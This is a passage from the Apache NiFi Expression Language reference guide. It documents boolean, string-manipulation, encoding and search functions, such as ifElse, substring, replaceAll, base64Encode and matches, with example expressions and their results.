this\n\tfunction with the <<matches>> function, which evaluates its subject against a Regular Expression.#\n\n[.subject]\n*Subject Type*: [.subject]#Any#\n\n[.arguments]\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. Must be same type as the Subject.#\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*:\nWe can check if the filename of a FlowFile is \"hello.txt\" by using the expression `${filename:equals('hello.txt')}`,\nor we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:\n`${hello:equals( ${filename} )}`.\n\n\n\n[.function]\n=== equalsIgnoreCase\n*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value but returns\n`true` if the two values differ only by case (upper case vs. lower case).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to \"hello.txt\"\n\tor \"HELLO.TXT\" or \"HeLLo.TxT\".\n\n\n\n\n[.function]\n=== gt\n*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than\n\tits argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte\n\t(1024 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== ge\n*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than\n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least (\n\tis greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.\n\n\n\n[.function]\n=== lt\n*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than\n\tits argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less than\n\t1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== le\n*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than\n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most\n\t(less than or equal to) 1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n\n\n[.function]\n=== and\n*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject\n\tand the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,\n\tthe function returns `false`. Typically, this is used with an embedded Expression as the argument.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression\n-----------------------------------------------\n${filename:toLower():equals( ${filename} ):and(\n\t${filename:length():ge(5)}\n)}\n-----------------------------------------------\n\n\n\n\n\n[.function]\n=== or\n\n*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject\n\tor the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. If\n\teither the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if\n\tthe filename is all lower-case.\n----------------------------------------------\n${filename:toLower():equals( ${filename} ):or(\n\t${filename:length():equals(5)}\n)}\n----------------------------------------------\n\n\n\n[.function]\n=== not\n\n[.description]\n*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#\n\n[.subject]\n*Subject Type*: [.subject]#Boolean#\n\n[.arguments]\n*Arguments*: No arguments\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*: We can invert the value of another function by using the `not` function, as\n\t`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to\n\t\"hello.txt\" and will return `false` if the filename is \"hello.txt.\"\n\n\n\n[.function]\n=== ifElse\n\n*Description*: [.description]#Evaluates the first argument if the Subject evaluates to `true`, or the second argument\nif the Subject evaluates to `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_EvaluateIfTrue_# : [.argDesc]#The value to return if the Subject is true#\n\t- [.argName]#_EvaluateIfFalse_# : [.argDesc]#The value to return if the Subject is false#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", the \"nullFilename\" attribute has\nthe value null, and the \"bool\" attribute has the value \"true\", then the following expressions will provide\nthe following results:\n\n\n\n.ifElse Examples\n|===================================================================\n| Expression | Value\n| `${bool:ifElse('a','b')}` | `a`\n| `${literal(true):ifElse('a','b')}` | `a`\n| `${nullFilename:isNull():ifElse('file does not exist', 'located file')}` | `file does not exist`\n| `${nullFilename:ifElse('found', 'not_found')}` | `not_found`\n| `${filename:ifElse('found', 'not_found')}` | `not_found`\n| `${filename:isNull():not():ifElse('found', 'not_found')}` | `found`\n|===================================================================\n\n\n\n\n[[strings]]\n== String Manipulation\n\nEach of the following functions manipulates a String in some way.\n\n\n\n\n[.function]\n=== toUpper\n\n*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it\n\treplaces any lowercase letter with the uppercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"abc123.txt\", then the Expression `${filename:toUpper()}`\n\twill return \"ABC123.TXT\"\n\n\n\n\n\n[.function]\n=== toLower\n\n*Description*: [.description]#This function converts the Subject into an all lower-case String. Said another way,\n\tit replaces any uppercase letter with the lowercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"ABC123.TXT\", then the Expression `${filename:toLower()}`\n\twill return \"abc123.txt\"\n\n\n\n\n\n[.function]\n=== trim\n\n*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute `attr` has the value \" 1 2 3 \", then the Expression `${attr:trim()}` will\n\treturn the value \"1 2 3\".\n\n\n\n\n[.function]\n=== substring\n\n*Description*:\n[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.\n\tIf the _ending index_ is not supplied, it will return the portion of the Subject starting at the given\n\t'start index' and ending at the end of the Subject value.#\n\n[.description]#The _starting index_ and _ending index_ are zero-based. That is, the first character is referenced by using\n\tthe value `0`, not `1`.#\n\n[.description]#If either the _starting index_ is or the _ending index_ is not a number, this function call will result\n\tin an error.#\n\n[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#\n\n[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value\n\tless than 0, this function call will result in an error.#\n\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#\n\t- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*:\n\nIf we have an attribute named \"filename\" with the value \"a brand new filename.txt\",\nthen the following Expressions will result in the following values:\n\n.Substring Examples\n|================================================================\n| Expression | Value\n| `${filename:substring(0,1)}` | `a`\n| `${filename:substring(2)}` | `brand new filename.txt`\n| `${filename:substring(12)}` | `filename.txt`\n| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`\n|================================================================\n\n\n\n\n[.function]\n=== substringBefore\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the first occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringBefore Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringBefore('.')}` | `a brand new filename`\n| `${filename:substringBefore(' ')}` | `a`\n| `${filename:substringBefore(' n')}` | `a brand`\n| `${filename:substringBefore('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringBeforeLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the last occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringBeforeLast Examples\n|==========================================================================\n| Expression | Value\n| `${filename:substringBeforeLast('.')}` | `a brand new filename`\n| `${filename:substringBeforeLast(' ')}` | `a brand new`\n| `${filename:substringBeforeLast(' n')}` | `a brand`\n| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`\n|==========================================================================\n\n\n\n\n\n\n[.function]\n=== substringAfter\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe first occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfter Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringAfter('.')}` | `txt`\n| `${filename:substringAfter(' ')}` | `brand new filename.txt`\n| `${filename:substringAfter(' n')}` | `ew filename.txt`\n| `${filename:substringAfter('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringAfterLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe last occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfterLast Examples\n|=========================================================================\n| Expression | Value\n| `${filename:substringAfterLast('.')}` | `txt`\n| `${filename:substringAfterLast(' ')}` | `filename.txt`\n| `${filename:substringAfterLast(' n')}` | `ew filename.txt`\n| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`\n|=========================================================================\n\n\n\n\n[.function]\n=== getDelimitedField\n\n*Description*: [.description]#Parses the Subject as a delimited line of text and returns just a single field\n\tfrom that delimited text.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_index_# : [.argDesc]#The index of the field to return. A value of 1 will return the first field,\n\t\ta value of 2 will return the second field, and so on.#\n\t- [.argName]#_delimiter_# : [.argDesc]#Optional argument that provides the character to use as a field separator.\n\t\tIf not specified, a comma will be used. This value must be exactly 1 character.#\n\t- [.argName]#_quoteChar_# : [.argDesc]#Optional argument that provides the character that can be used to quote values\n\t\tso that the delimiter can be used within a single field. If not specified, a double-quote (\") will be used. This value\n\t\tmust be exactly 1 character.#\n\t- [.argName]#_escapeChar_# : [.argDesc]#Optional argument that provides the character that can be used to escape the Quote Character\n\t or the Delimiter within a field. If not specified, a backslash (\\) is used. This value must be exactly 1 character.#\n\t- [.argName]#_stripChars_# : [.argDesc]#Optional argument that specifies whether or not quote characters and escape characters should\n\t be stripped. For example, if we have a field value \"1, 2, 3\" and this value is true, we will get the value `1, 2, 3`, but if this\n\t value is false, we will get the value `\"1, 2, 3\"` with the quotes. The default value is false. This value must be either `true`\n\t or `false`.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"line\" attribute contains the value _\"Jacobson, John\", 32, Mr._\n\tand the \"altLine\" attribute contains the value _Jacobson, John|32|Mr._\n then the following Expressions will result in the following values:\n\n.GetDelimitedField Examples\n|======================================================================\n| Expression | Value\n| `${line:getDelimitedField(2)}` | _(space)_32\n| `${line:getDelimitedField(2):trim()}` | 32\n| `${line:getDelimitedField(1)}` | \"Jacobson, John\"\n| `${line:getDelimitedField(1, ',', '\"', '\\\\', true)}` | Jacobson, John\n| `${altLine:getDelimitedField(1, '\\|')}` | Jacobson, John\n|======================================================================\n\n\n\n[.function]\n=== append\n\n*Description*: [.description]#The `append` function returns the result of appending the argument to the value of\n\tthe Subject. If the Subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:append('.gz')}` will return \"a brand new filename.txt.gz\".\n\n\n\n\n\n[.function]\n=== prepend\n\n*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of\n\tthe Subject. If the subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#\n\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"filename.txt\", then the Expression\n\t`${filename:prepend('a brand new ')}` will return \"a brand new filename.txt\".\n\n\n\n\n\n[.function]\n=== replace\n\n*Description*: [.description]#Replaces *all* occurrences of one literal String within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.Replace Examples\n|===================================================================\n| Expression | Value\n| `${filename:replace('.', '_')}` | `a brand new filename_txt`\n| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`\n| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replace('filename', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceFirst\n\n*Description*: [.description]#Replaces *the first* occurrence of one literal String or regular expression within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String (literal or regular expression pattern) to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.ReplaceFirst Examples\n|===================================================================\n| Expression | Value\n| `${filename:replaceFirst('a', 'the')}` | `the brand new filename.txt`\n| `${filename:replaceFirst('[br]', 'g')}` | `a grand new filename.txt`\n| `${filename:replaceFirst('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceFirst('\\w{8}', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceAll\n\n*Description*: [.description]#The `replaceAll` function takes two String arguments: a literal String or Regular Expression (NiFi uses the Java Pattern\n\tsyntax), and a replacement string. The return value is the result of substituting the replacement string for\n\tall patterns within the Subject that match the Regular Expression.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in Java syntax) to match in the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. If the _regular expression_\n\t\targument uses Capturing Groups, back references are allowed in the _replacement_.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.ReplaceAll Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:replaceAll('\\..*', '')}` | `a brand new filename`\n| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`\n| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== replaceNull\n\n*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#\n\n*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:replaceNull('abc')}` will return\n\t\"a brand new filename.txt\", while `${hello:replaceNull('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== replaceEmpty\n\n*Description*: [.description]#The `replaceEmpty` function returns the argument if the Subject is null or\n\tif the Subject consists only of white space (new line, carriage return, tab, space). Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null or empty.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" has the value \" \", then the Expression `${filename:replaceEmpty('abc')}` will return\n\t\"a brand new filename.txt\", while `${hello:replaceEmpty('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== length\n\n*Description*: [.description]#Returns the length of the Subject#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"filename\" has a value of \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`\n\twill return 0.\n\n\n[[encode]]\n== Encode\/Decode Functions\n\nEach of the following functions will encode a string according the rules of the given data format.\n\n\n\n\n[.function]\n=== escapeJson\n\n*Description*: [.description]#This function prepares the Subject to be inserted into JSON document by escaping the characters\n in the String using Json String rules. The function correctly escapes quotes and control-chars (tab, backslash,\n cr, ff, etc.)#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'He didn't say, \"Stop!\"', then the Expression `${message:escapeJson()}`\n will return 'He didn't say, \\\"Stop!\\\"'\n\n\n\n\n[.function]\n=== escapeXml\n\n*Description*: [.description]#This function prepares the Subject to be inserted into XML document by escaping the characters\n in a String using XML entities. The function correctly escapes quotes, apostrophe, ampersand, <, > and\n control-chars.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeXml()}`\n will return '"bread" & "butter"'\n\n\n\n\n[.function]\n=== escapeCsv\n\n*Description*: [.description]#This function prepares the Subject to be inserted into CSV document by escaping the characters\n in a String using the rules in RFC 4180. The function correctly escapes quotes and surround the string in quotes if needed.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'But finally, she left', then the Expression `${message:escapeCsv()}`\n will return '\"But finally, she left\"'\n\n\n\n\n[.function]\n=== escapeHtml3\n\n*Description*: [.description]#This function prepares the Subject to be inserted into HTML document by escaping the characters\n in a String using the HTML entities. Supports only the HTML 3.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeHtml3()}`\n will return '"bread" & "butter"'\n\n\n\n\n[.function]\n=== escapeHtml4\n\n*Description*: [.description]#This function prepares the Subject to be inserted into HTML document by escaping the characters\n in a String using the HTML entities. Supports all known HTML 4.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeHtml4()}`\n will return '"bread" & "butter"'\n\n\n\n\n[.function]\n=== unescapeJson\n\n*Description*: [.description]#This function unescapes any Json literals found in the String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'He didn't say, \\\"Stop!\\\"', then the Expression `${message:unescapeJson()}`\n will return 'He didn't say, \"Stop!\"'\n\n\n\n\n[.function]\n=== unescapeXml\n\n*Description*: [.description]#This function unescapes a string containing XML entity escapes to a string containing the\n actual Unicode characters corresponding to the escapes. Supports only the five basic XML entities (gt, lt,\n quot, amp, apos).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '"bread" & "butter"', then the Expression `${message:unescapeXml()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== unescapeCsv\n\n*Description*: [.description]#This function unescapes a String from a CSV document according to the rules of RFC 4180.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"But finally, she left\"', then the Expression `${message:unescapeCsv()}`\n will return 'But finally, she left'\n\n\n\n\n[.function]\n=== unescapeHtml3\n\n*Description*: [.description]#This function unescapes a string containing HTML 3 entity to a string containing the\n actual Unicode characters corresponding to the escapes. Supports only HTML 3.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '"bread" & "butter"', then the Expression `${message:unescapeHtml3()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== unescapeHtml4\n\n*Description*: [.description]#This function unescapes a string containing HTML 4 entity to a string containing the\n actual Unicode characters corresponding to the escapes. Supports all known HTML 4.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '"bread" & "butter"', then the Expression `${message:unescapeHtml4()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== urlEncode\n\n*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an\n\tattribute value to indicate the URL of a website.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can URL-Encode an attribute named \"url\" by using the Expression `${url:urlEncode()}`. If\n\tthe value of the \"url\" attribute is \"https:\/\/nifi.apache.org\/some value with spaces\", this\n\tExpression will then return \"https:\/\/nifi.apache.org\/some%20value%20with%20spaces\".\n\n\n\n\n[.function]\n=== urlDecode\n\n*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a URL-Encoded attribute named \"url\" with the value\n\t\"https:\/\/nifi.apache.org\/some%20value%20with%20spaces\", then the Expression\n\t`${url:urlDecode()}` will return \"https:\/\/nifi.apache.org\/some value with spaces\".\n\n\n\n\n[.function]\n=== base64Encode\n\n*Description*: [.description]#Returns a Base64 encoded string. This is useful for being able to transfer binary data as ascii.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can Base64-Encoded an attribute named \"payload\" by using the Expression\n\t `${payload:base64Encode()}` If the attribute payload had a value of \"admin:admin\"\n\t then the Expression `${payload:base64Encode()}` will return \"YWRtaW46YWRtaW4=\".\n\n\n\n\n[.function]\n=== base64Decode\n\n*Description*: [.description]#Reverses the Base64 encoding on given string.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a Base64-Encoded attribute named \"payload\" with the value\n\t\"YWRtaW46YWRtaW4=\", then the Expression\n\t`${payload:base64Decode()}` will return \"admin:admin\".\n\n\n\n[[searching]]\n== Searching\n\nEach of the following functions is used to search its subject for some value.\n\n\n[.function]\n=== startsWith\n\n*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will\n\treturn `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.\n\n\n\n\n\n[.function]\n=== endsWith\n\n*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will\n\treturn `false`. `${filename:toUpper():endsWith('TXT')}` returns `true`.\n\n\n\n\n\n[.function]\n=== contains\n\n*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will\n\treturn `false`. `${filename:toUpper():contains('NEW')}` returns `true`.\n\n\n\n\n\n[.function]\n=== in\n\n*Description*: [.description]#Returns `true` if the Subject is matching one of the provided arguments.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value1_# : [.argDesc]#First possible matching value#\n\t- [.argName]#_valueN_# : [.argDesc]#Nth possible matching value#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"myEnum\" attribute has the value \"JOHN\", then the Expression\n\t`${myEnum:in(\"PAUL\", \"JOHN\", \"MIKE\")}` will return `true`. `${myEnum:in(\"RED\", \"GREEN\", \"BLUE\")}` will\n\treturn `false`.\n\n\n\n\n\n[.function]\n=== find\n\n*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the\n\tRegular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.find Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`\n| `${filename:find('Brand.*')}` | `false`\n| `${filename:find('brand')}` | `true`\n|=======================================================================================\n\n\n\n\n\n[.function]\n=== matches\n\n*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.matches Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:matches('a.*txt')}` | `true`\n| `${filename:matches('brand')}` | `false`\n| `${filename:matches('.+brand.+')}` | 